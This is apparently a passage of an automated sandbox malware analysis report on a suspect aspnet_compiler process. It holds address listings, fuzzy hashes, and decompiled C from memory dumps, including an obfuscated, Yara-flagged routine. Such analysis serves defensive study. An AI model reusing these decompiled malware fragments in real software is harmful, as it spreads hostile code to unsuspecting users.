                                                  0x0189dac9
                                                  0x0189dacc
                                                  0x0189dacf
                                                  0x0189dad1
                                                  0x0189dd78
                                                  0x0189dd78
                                                  0x0189dcf2
                                                  0x00000000
                                                  0x0189dad7
                                                  0x0189dad9
                                                  0x0189dadb
                                                  0x00000000
                                                  0x00000000
                                                  0x0189dae1
                                                  0x0189dae1
                                                  0x0189dae4
                                                  0x0189dae6
                                                  0x018eb4f9
                                                  0x018eb4f9
                                                  0x018eb500
                                                  0x0189daec
                                                  0x0189daec
                                                  0x0189daf5
                                                  0x0189daf8
                                                  0x0189dafb
                                                  0x0189db03
                                                  0x0189db11
                                                  0x0189db16
                                                  0x0189db19
                                                  0x0189db1b
                                                  0x018eb52c
                                                  0x018eb531
                                                  0x018eb534
                                                  0x0189db21
                                                  0x0189db21
                                                  0x0189db24
                                                  0x0189dcd9
                                                  0x0189dce2
                                                  0x0189dce5
                                                  0x0189dd6a
                                                  0x0189dd6d
                                                  0x00000000
                                                  0x0189dd73
                                                  0x018eb51a
                                                  0x018eb51c
                                                  0x018eb51f
                                                  0x018eb524
                                                  0x00000000
                                                  0x018eb524
                                                  0x0189dce7
                                                  0x0189dce7
                                                  0x0189dce7
                                                  0x00000000
                                                  0x0189dce7
                                                  0x00000000
                                                  0x0189db2a
                                                  0x0189db2c
                                                  0x0189db31
                                                  0x0189db33
                                                  0x0189db36
                                                  0x0189db39
                                                  0x0189db3b
                                                  0x0189db66
                                                  0x0189db66
                                                  0x0189db3d
                                                  0x0189db3d
                                                  0x0189db3e
                                                  0x0189db46
                                                  0x0189db47
                                                  0x0189db49
                                                  0x0189db4c
                                                  0x0189db53
                                                  0x0189db55
                                                  0x0189db58
                                                  0x0189db5a
                                                  0x018eb50a
                                                  0x018eb50f
                                                  0x018eb512
                                                  0x0189db60
                                                  0x0189db60
                                                  0x0189db63
                                                  0x0189db63
                                                  0x00000000
                                                  0x0189db63
                                                  0x0189db5a
                                                  0x0189db3b
                                                  0x0189db24
                                                  0x0189db69
                                                  0x0189db69
                                                  0x0189db6c
                                                  0x0189db6f
                                                  0x0189db74
                                                  0x018eb557
                                                  0x018eb557
                                                  0x018eb55e
                                                  0x0189db7a
                                                  0x0189db7c
                                                  0x0189db7f
                                                  0x0189db82
                                                  0x0189db85
                                                  0x00000000
                                                  0x0189db8b
                                                  0x0189db8b
                                                  0x0189db8d
                                                  0x0189db9b
                                                  0x0189db9b
                                                  0x0189db9d
                                                  0x0189dba0
                                                  0x0189dba2
                                                  0x0189dba4
                                                  0x0189dba7
                                                  0x0189dba9
                                                  0x0189dbae
                                                  0x0189dbae
                                                  0x0189dbb1
                                                  0x0189dbb4
                                                  0x0189dbb4
                                                  0x0189dbb7
                                                  0x0189dbba
                                                  0x0189dcd2
                                                  0x0189dcd4
                                                  0x00000000
                                                  0x0189dbc0
                                                  0x0189dbc0
                                                  0x0189dbd2
                                                  0x0189dbd7
                                                  0x0189dbda
                                                  0x0189dbdd
                                                  0x0189dbdf
                                                  0x00000000
                                                  0x0189dbe5
                                                  0x0189dbe5
                                                  0x0189dbee
                                                  0x0189dbf1
                                                  0x018eb541
                                                  0x018eb544
                                                  0x00000000
                                                  0x018eb546
                                                  0x018eb546
                                                  0x00000000
                                                  0x018eb546
                                                  0x0189dbf7
                                                  0x0189dbf7
                                                  0x0189dbfd
                                                  0x0189dbfd
                                                  0x0189dbff
                                                  0x0189dc0b
                                                  0x0189dc15
                                                  0x0189dc1b
                                                  0x0189dc1d
                                                  0x0189dc21
                                                  0x0189dc21
                                                  0x0189dc23
                                                  0x0189dc23
                                                  0x0189dc26
                                                  0x0189dc29
                                                  0x0189dc2b
                                                  0x00000000
                                                  0x00000000
                                                  0x0189dc31
                                                  0x0189dc34
                                                  0x0189dc36
                                                  0x0189dcbf
                                                  0x0189dcbf
                                                  0x0189dcc2
                                                  0x00000000
                                                  0x0189dc3c
                                                  0x0189dc41
                                                  0x0189dc43
                                                  0x00000000
                                                  0x0189dc45
                                                  0x0189dc45
                                                  0x0189dc47
                                                  0x00000000
                                                  0x0189dc4d
                                                  0x0189dc4d
                                                  0x0189dc50
                                                  0x0189dc52
                                                  0x0189dc55
                                                  0x0189dcfa
                                                  0x0189dcfe
                                                  0x0189dd08
                                                  0x0189dd0a
                                                  0x0189dd0c
                                                  0x00000000
                                                  0x0189dd12
                                                  0x0189dd15
                                                  0x0189dd2d
                                                  0x0189dd2f
                                                  0x0189dd32
                                                  0x0189dd35
                                                  0x00000000
                                                  0x0189dd35
                                                  0x0189dc5b
                                                  0x0189dc5b
                                                  0x0189dc5e
                                                  0x0189dc61
                                                  0x0189dc64
                                                  0x0189dc67
                                                  0x0189dc67
                                                  0x0189dc6a
                                                  0x0189dc6c
                                                  0x0189dc8e
                                                  0x0189dc8e
                                                  0x0189dc91
                                                  0x0189dc93
                                                  0x0189dcce
                                                  0x0189dcce
                                                  0x0189dc95
                                                  0x0189dc9c
                                                  0x0189dc6e
                                                  0x0189dc72
                                                  0x0189dc75
                                                  0x0189dc77
                                                  0x0189dc79
                                                  0x018eb551
                                                  0x018eb551
                                                  0x00000000
                                                  0x0189dc7f
                                                  0x0189dc7f
                                                  0x0189dc81
                                                  0x00000000
                                                  0x0189dc83
                                                  0x0189dc86
                                                  0x0189dc88
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0189dc88
                                                  0x0189dc81
                                                  0x0189dc79
                                                  0x0189dc6c
                                                  0x0189dc55
                                                  0x0189dc47
                                                  0x0189dc43
                                                  0x00000000
                                                  0x0189dc36
                                                  0x0189dc23
                                                  0x00000000
                                                  0x0189dbff
                                                  0x0189dbf1
                                                  0x0189dbdf
                                                  0x0189db8f
                                                  0x0189db92
                                                  0x0189db95
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0189db95
                                                  0x0189db8d
                                                  0x0189db85
                                                  0x0189db74
                                                  0x0189dc9f
                                                  0x0189dca2
                                                  0x0189dcb0
                                                  0x0189dcb0
                                                  0x0189dad1
                                                  0x018eb4e5
                                                  0x018eb4c8
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0189d831
                                                  0x00000000
                                                  0x0189d800
                                                  0x018eb47f
                                                  0x018eb485
                                                  0x00000000
                                                  0x018eb485
                                                  0x0189d665
                                                  0x0189d652
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e7ef5c2b5d1387c0a913e42faa0b7f00dc1b8b3714a6cdb080b87593f5f6bff2
                                                  • Instruction ID: c855d894503c5fb52631fed9566e7d127817c61ed436464ec5da1a1346324056
                                                  • Opcode Fuzzy Hash: e7ef5c2b5d1387c0a913e42faa0b7f00dc1b8b3714a6cdb080b87593f5f6bff2
                                                  • Instruction Fuzzy Hash: ACE1C230A04359DFEF35CF58C984B69B7B1BF85308F080299DA09EB291D7349B41CB96
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041C22E Relevance: .3, Instructions: 259COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 20%
                                                  			E0041C22E() {
				intOrPtr _t44;
				signed char _t47;
				signed char _t48;
				intOrPtr _t51;
				void* _t56;
				void* _t57;
				void* _t58;
				signed char _t63;
				char _t68;
				signed int _t70;
				signed int _t77;
				void* _t82;
				intOrPtr _t83;
				signed int _t98;

				asm("sbb edi, [0xa56c801d]");
				asm("movsw");
				asm("lodsb");
				 *0xc7cfc6c5 =  *0xc7cfc6c5 >> 0x77;
				 *0xd646a4e5 =  *0xd646a4e5 + _t70;
				asm("stosd");
				_t83 = _t82 - 1;
				if(_t83 > 0) {
					 *0xbcbec76 =  *0xbcbec76 ^ __eax;
					__ecx = __ecx ^  *0xee7bd611;
					 *0x609dc6c6 =  *0x609dc6c6 >> 0xcd;
					__esp = __esp - 1;
					asm("rol byte [0x76288f88], 0x5c");
					__bl = __bl &  *0xcc619714;
					asm("lodsd");
					__esp = __esp |  *0x15ffa821;
					asm("adc edx, [0xa2dc6a95]");
					__edi = __edi +  *0x1cbd1f11;
					if(__edi >= 0) {
						 *0x360b0872 =  *0x360b0872 & __esp;
						_t29 = __ebp;
						__ebp =  *0xe5486864;
						 *0xe5486864 = _t29;
						__esi = __esi + 0x6b9ec26f;
						__edx = __edx +  *0x9212760e;
						__ebx = __ebx + 1;
						asm("rol dword [0xc365eccf], 0x6f");
						__ebp =  *0xe5486864 -  *0xe587ea0b;
						asm("scasd");
						__bh = __bh &  *0x4ae3f6e2;
						__esp = __esp - 1;
						__edx = __edx & 0xe8109735;
						asm("sbb ecx, 0xd433cb83");
						__ebp =  *0xe5486864 -  *0xe587ea0b ^  *0x3f18efdd;
						 *0x5cc5722b =  *0x5cc5722b ^ __ebx;
						asm("rcr byte [0x560d51b1], 0x62");
						 *0x2db04203 =  *0x2db04203 << 0xb1;
						 *0x815af4fc = __ecx;
						 *0xd6cdcc1b = __eax;
						asm("adc dl, [0x6d217e14]");
						 *0x1b803bd3 =  *0x1b803bd3 >> 0xd5;
						asm("sbb eax, 0x150d3a35");
						__ebp = 0xdac8c283;
						__edx = __edx ^  *0xd94b7ec1;
						__ebp = 0x1088c002;
						if(0xdac8c283 != 0) {
							 *0xb608359a = 0xdac8c283;
							asm("sbb ecx, [0x16d56525]");
							if(0xffffffff82404000 == 0) {
								__eax =  *0x7a13575;
								__eax =  *0x7a13575 |  *0xa976df81;
								asm("rol byte [0xc97d8122], 0x15");
								__ebx = __ebx |  *0xfac02991;
								if(__ebx == 0) {
									asm("adc esi, [0x2c13068d]");
									L1();
									__edi = __edi -  *0xbc92572d;
									__eax = __eax &  *0x54c3bed6;
									 *0xfb849cfa =  *0xfb849cfa ^ __eax;
									_t38 = __ecx;
									__ecx =  *0x730be1bf;
									 *0x730be1bf = _t38;
									asm("rcl dword [0x198e36ff], 0x63");
									 *0x71209735 =  *0x71209735 >> 0x36;
									asm("rol byte [0x34b3590c], 0x13");
									__esp = __esp |  *0xc1400e09;
									__eax = __eax |  *0xd7d1ba13;
									asm("rol dword [0x8c7cc6ed], 0xa");
									_pop(__esi);
									 *0x5e9f1bee =  *0x5e9f1bee + __eax;
									__ebp = 0x1088c003;
									asm("stosb");
									__bl = __bl ^  *0xbff21c86;
									__al = __al & 0x000000d0;
									__edi =  *0xfb696ec;
									 *0x86b14987 =  *0x86b14987 ^ __esp;
									__esp = __esp | 0x866be497;
									 *0xc95bc235 =  *0xc95bc235 ^ __eax;
									 *0x14627cd3 =  *0x14627cd3 & __eax;
									asm("lodsd");
									_pop( *0x5607eefc);
									__eax = __eax ^  *0x3cd81edd;
									asm("adc ah, 0x1c");
									 *0x10080435 =  *0x10080435 & __ebx;
									_t41 = __ah;
									__ah =  *0xd0357be5;
									 *0xd0357be5 = _t41;
									asm("sbb dh, 0xa2");
									 *0xe3fceb1c =  *0xe3fceb1c << 0xff;
									__edx = __edx - 1;
									__esp = __esp - 1;
									__esp = __esp & 0x92119735;
									__edi =  *0xfb696ec - 1;
									asm("sbb [0xbfd592ba], ebp");
									 *0x229ef1b8 =  *0x229ef1b8 >> 0x43;
									asm("sbb ah, 0xca");
									__edi =  *0xfb696ec - 0x00000001 ^  *0x8f88d0bc;
									 *0x2127628 =  *0x2127628 >> 0xef;
									__edi = ( *0xfb696ec - 0x00000001 ^  *0x8f88d0bc) +  *0xfac3d59f;
									asm("adc ecx, [0x6a6d3898]");
									__eax = __eax - 1;
									( *0xfb696ec - 0x00000001 ^  *0x8f88d0bc) +  *0xfac3d59f - 0xf1021426 = ( *0xfb696ec - 0x00000001 ^  *0x8f88d0bc) +  *0xfac3d59f - 0xf1021426 -  *0xedad070e;
								}
							}
						}
					}
				}
				L1:
				_t44 =  *0x8a5b6f09;
				 *0xe2fbac3a =  *0xe2fbac3a << 0xd4;
				 *0xd80d5962 =  *0xd80d5962 >> 0x94;
				_t83 = _t83 +  *0xd42ffed1;
				asm("rol dword [0x49f30da1], 0xe6");
				_t98 = _t98 |  *0xcd6b907;
				asm("adc [0x27be62cc], ecx");
				_t51 =  *0x4c6af8e6;
				asm("rcl byte [0x61261908], 0xa0");
				asm("ror dword [0xef2805f5], 0x5e");
				L1();
				_t3 = _t77 | 0x3070619a;
				_t77 =  *0xd9fa7c9c;
				 *0xd9fa7c9c = _t3;
				asm("rcr byte [0x731c7df2], 0x27");
				if(_t44 > 0xd9c1ae8) {
					asm("adc edi, 0xfd9e09bb");
					asm("adc esi, [0x373123f3]");
					 *0xf3b326f4 =  *0xf3b326f4 << 0x43;
					_push(_t63 - 0x24c955fa ^  *0xad1f370d | 0x000000c9);
					 *0x8b9fc10a =  *0x8b9fc10a ^ _t70;
					 *0x89c3023b =  *0x89c3023b >> 0x5b;
					_pop(_t68);
					 *0x6afee6c2 =  *0x6afee6c2 << 0x8d;
					 *0xe6c91d8a =  *0xe6c91d8a | _t51 - 0x00000001 | 0x00000014;
					 *0x626bb1bd = _t70 +  *0x38460a9c;
					asm("adc al, 0x12");
					asm("ror dword [0xcaffddc7], 0x5c");
					_t98 = 0xa99f0094;
					 *0xe8df222b =  *0x9033af85;
					asm("adc dh, 0x12");
					_t47 =  *0x93002a0c;
					 *0x93002a0c = _t44 + 0x0000000a & 0x000000f9;
					asm("adc ch, 0xe3");
					 *0xc3c651b4 = _t68;
					asm("rcl dword [0x300e6fed], 0x51");
					_t77 = (_t77 +  *0xa5c54f2f - 0x00000001 |  *0x160f6aff) + 1;
					 *0xa0e5fbd6 =  *0xa0e5fbd6 >> 0x77;
					 *0x5f260af2 =  *0x5f260af2 >> 0xe3;
					_pop(_t56);
					_t63 = _t68 -  *0xd05ea5f4;
					 *0xf17fe60b =  *0xf17fe60b >> 0x94;
					asm("stosb");
					asm("adc [0xe66c437], eax");
					asm("sbb [0xc5e55ecc], eax");
					asm("sbb al, [0xba4179e2]");
					 *0xc5f4d7be =  *0xc5f4d7be >> 0xf0;
					_t57 = _t56 + 1;
					 *0xc40009f9 =  *0xc40009f9 + _t47;
					asm("ror dword [0xbb39d8a1], 0xcd");
					_t83 =  *0x84bf4e25;
					asm("scasb");
					_t70 = 0xa0 -  *0x3c55651d ^  *0xb6825ee4;
					if(0xa2 == 0) {
						asm("adc [0xb2faa87a], edi");
						_t70 = _t70 &  *0xbe1ee96d;
						 *0x3498282b =  *0x3498282b >> 0x49;
						_push(0xa5ed0368);
						_t63 = (_t63 ^  *0x8689a4e7) & 0x00000080;
						if( *0xe01eda6a * 0xad24 == 0) {
							 *0x7668bbfe =  *0x7668bbfe - _t63;
							_t48 = _t47 |  *0x1b953786;
							 *0x3412f934 =  *0x3412f934 << 0x2f;
							L1();
							 *0xe382fce6 =  *0xe382fce6 >> 0xb;
							 *0xb5082a30 =  *0xb5082a30 << 0xf0;
							asm("scasd");
							asm("sbb eax, 0x2958af36");
							 *0x931ecd94 =  *0x931ecd94 + _t98;
							_t58 = _t57 + 0xb4;
							asm("sbb [0x356c71a], dh");
							_t83 = _t83 + 1;
							_t63 = _t98;
							asm("adc eax, [0x9778e5f4]");
							 *0xaa6bb40b =  *0xaa6bb40b - _t58;
							asm("sbb [0x510b800e], ecx");
							asm("lodsd");
							_t70 = _t70 &  *0xb9c4fe8 ^  *0x6a3db73d;
							asm("ror byte [0x84306604], 0x3d");
							_t98 = _t98 + 1;
							 *0x12d55c86 =  *0x12d55c86 + _t58 -  *0xdb6f22f2;
							 *0x70491025 =  *0x70491025 << 0xa4;
							 *0xe1446d28 =  *0xe1446d28 << 0xd1;
							if( *0xe1446d28 < 0) {
								 *0x9033ac79 = _t48;
								_t63 = _t63 + 0x12;
							}
						}
					}
				}
				goto L1;
			}

















                                                  0x0041c234
                                                  0x0041c23a
                                                  0x0041c23c
                                                  0x0041c23d
                                                  0x0041c24d
                                                  0x0041c253
                                                  0x0041c254
                                                  0x0041c255
                                                  0x0041c25b
                                                  0x0041c261
                                                  0x0041c267
                                                  0x0041c274
                                                  0x0041c278
                                                  0x0041c27f
                                                  0x0041c285
                                                  0x0041c292
                                                  0x0041c298
                                                  0x0041c29e
                                                  0x0041c2a4
                                                  0x0041c2aa
                                                  0x0041c2b0
                                                  0x0041c2b0
                                                  0x0041c2b0
                                                  0x0041c2b6
                                                  0x0041c2bc
                                                  0x0041c2c2
                                                  0x0041c2c8
                                                  0x0041c2db
                                                  0x0041c2e1
                                                  0x0041c2e2
                                                  0x0041c2e8
                                                  0x0041c2e9
                                                  0x0041c2ef
                                                  0x0041c2f5
                                                  0x0041c2fc
                                                  0x0041c302
                                                  0x0041c309
                                                  0x0041c310
                                                  0x0041c316
                                                  0x0041c31b
                                                  0x0041c321
                                                  0x0041c328
                                                  0x0041c32d
                                                  0x0041c333
                                                  0x0041c33c
                                                  0x0041c342
                                                  0x0041c34e
                                                  0x0041c354
                                                  0x0041c35a
                                                  0x0041c360
                                                  0x0041c365
                                                  0x0041c36b
                                                  0x0041c372
                                                  0x0041c378
                                                  0x0041c384
                                                  0x0041c38a
                                                  0x0041c395
                                                  0x0041c39b
                                                  0x0041c3a1
                                                  0x0041c3a7
                                                  0x0041c3a7
                                                  0x0041c3a7
                                                  0x0041c3ad
                                                  0x0041c3ba
                                                  0x0041c3c1
                                                  0x0041c3c8
                                                  0x0041c3ce
                                                  0x0041c3d4
                                                  0x0041c3db
                                                  0x0041c3dc
                                                  0x0041c3e2
                                                  0x0041c3e3
                                                  0x0041c3e4
                                                  0x0041c3ea
                                                  0x0041c3ec
                                                  0x0041c3f2
                                                  0x0041c3f8
                                                  0x0041c3fe
                                                  0x0041c404
                                                  0x0041c40d
                                                  0x0041c40e
                                                  0x0041c414
                                                  0x0041c41a
                                                  0x0041c41d
                                                  0x0041c423
                                                  0x0041c423
                                                  0x0041c423
                                                  0x0041c429
                                                  0x0041c432
                                                  0x0041c439
                                                  0x0041c43a
                                                  0x0041c43b
                                                  0x0041c441
                                                  0x0041c442
                                                  0x0041c448
                                                  0x0041c44f
                                                  0x0041c452
                                                  0x0041c458
                                                  0x0041c45f
                                                  0x0041c465
                                                  0x0041c46b
                                                  0x0041c478
                                                  0x0041c478
                                                  0x0041c378
                                                  0x0041c35a
                                                  0x0041c342
                                                  0x0041c2a4
                                                  0x0041b8c6
                                                  0x0041b8c6
                                                  0x0041b8cb
                                                  0x0041b8d2
                                                  0x0041b8d9
                                                  0x0041b8e0
                                                  0x0041b8e7
                                                  0x0041b8f3
                                                  0x0041b8f9
                                                  0x0041b8ff
                                                  0x0041b90c
                                                  0x0041b913
                                                  0x0041b91d
                                                  0x0041b91d
                                                  0x0041b91d
                                                  0x0041b923
                                                  0x0041b92a
                                                  0x0041b93e
                                                  0x0041b944
                                                  0x0041b962
                                                  0x0041b96c
                                                  0x0041b96d
                                                  0x0041b985
                                                  0x0041b98c
                                                  0x0041b9a1
                                                  0x0041b9b1
                                                  0x0041b9cd
                                                  0x0041b9d3
                                                  0x0041b9de
                                                  0x0041b9e5
                                                  0x0041b9f2
                                                  0x0041b9f8
                                                  0x0041ba01
                                                  0x0041ba01
                                                  0x0041ba07
                                                  0x0041ba10
                                                  0x0041ba1e
                                                  0x0041ba25
                                                  0x0041ba26
                                                  0x0041ba37
                                                  0x0041ba4d
                                                  0x0041ba4e
                                                  0x0041ba5f
                                                  0x0041ba66
                                                  0x0041ba67
                                                  0x0041ba6d
                                                  0x0041ba73
                                                  0x0041ba79
                                                  0x0041ba80
                                                  0x0041ba81
                                                  0x0041ba87
                                                  0x0041ba8e
                                                  0x0041ba9a
                                                  0x0041ba9b
                                                  0x0041baa1
                                                  0x0041baa7
                                                  0x0041baad
                                                  0x0041bab3
                                                  0x0041baba
                                                  0x0041bac5
                                                  0x0041bad2
                                                  0x0041bade
                                                  0x0041bae4
                                                  0x0041baea
                                                  0x0041baf1
                                                  0x0041bafc
                                                  0x0041bb03
                                                  0x0041bb0a
                                                  0x0041bb0c
                                                  0x0041bb11
                                                  0x0041bb17
                                                  0x0041bb1f
                                                  0x0041bb25
                                                  0x0041bb26
                                                  0x0041bb33
                                                  0x0041bb39
                                                  0x0041bb4b
                                                  0x0041bb51
                                                  0x0041bb52
                                                  0x0041bb58
                                                  0x0041bb5f
                                                  0x0041bb72
                                                  0x0041bb7e
                                                  0x0041bb87
                                                  0x0041bb8e
                                                  0x0041bb94
                                                  0x0041bb9a
                                                  0x0041bb9d
                                                  0x0041bb8e
                                                  0x0041bad2
                                                  0x0041baa1
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.341848182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 02df365f51cc4e249a7f613a648d14e450d1b844e622aa7c3e34f18a031fd613
                                                  • Instruction ID: f006f715de6ad77b474cb085c610a972660e2338aac9d720c309819018f1d335
                                                  • Opcode Fuzzy Hash: 02df365f51cc4e249a7f613a648d14e450d1b844e622aa7c3e34f18a031fd613
                                                  • Instruction Fuzzy Hash: F9C16372A28781CFE71ADF38D986B813FB1F752324B08425EC9A1975D2D734205ACF89
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018B513A Relevance: .3, Instructions: 258COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 67%
                                                  			E018B513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x197d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E018CD0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E018A2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L018A4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E018CF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								L0189FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x197b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return L018CB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                                  0x018b5142
                                                  0x018b514c
                                                  0x018b5150
                                                  0x018b5157
                                                  0x018b5159
                                                  0x018b515e
                                                  0x018b5165
                                                  0x018b5169
                                                  0x018b516c
                                                  0x018b5172
                                                  0x018b5176
                                                  0x018b517a
                                                  0x018b517a
                                                  0x018b517a
                                                  0x018b517f
                                                  0x018f6d8b
                                                  0x018f6d8e
                                                  0x018f6d91
                                                  0x018f6d95
                                                  0x018f6d98
                                                  0x018f6d9c
                                                  0x018f6da0
                                                  0x018f6da3
                                                  0x018f6da7
                                                  0x018f6e26
                                                  0x018f6e26
                                                  0x018f6e2a
                                                  0x018b51f9
                                                  0x018b51f9
                                                  0x018b51fe
                                                  0x018f6e33
                                                  0x018f6e33
